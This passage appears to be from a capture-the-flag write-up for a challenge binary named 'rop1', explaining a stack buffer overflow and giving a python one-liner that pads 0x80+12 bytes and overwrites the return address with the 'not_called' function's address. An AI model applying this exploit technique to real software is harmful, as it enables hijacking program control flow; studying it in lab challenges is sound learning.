to overwrite the 'vulnerable_function' return address, we need 0x80 + 12 junk of buffer plus address of 'not_called'. So, the payload skeleton is: ["\x41"*(0x80 + 12)] + [address of 'not_called' subroutine]
(python -c 'import sys,struct;sys.stdout.write("\x41"*(0x80 + 12) + struct.pack("<I", 0x080484a4))'; cat -) | ./rop1-fa6168f4d8eba0eb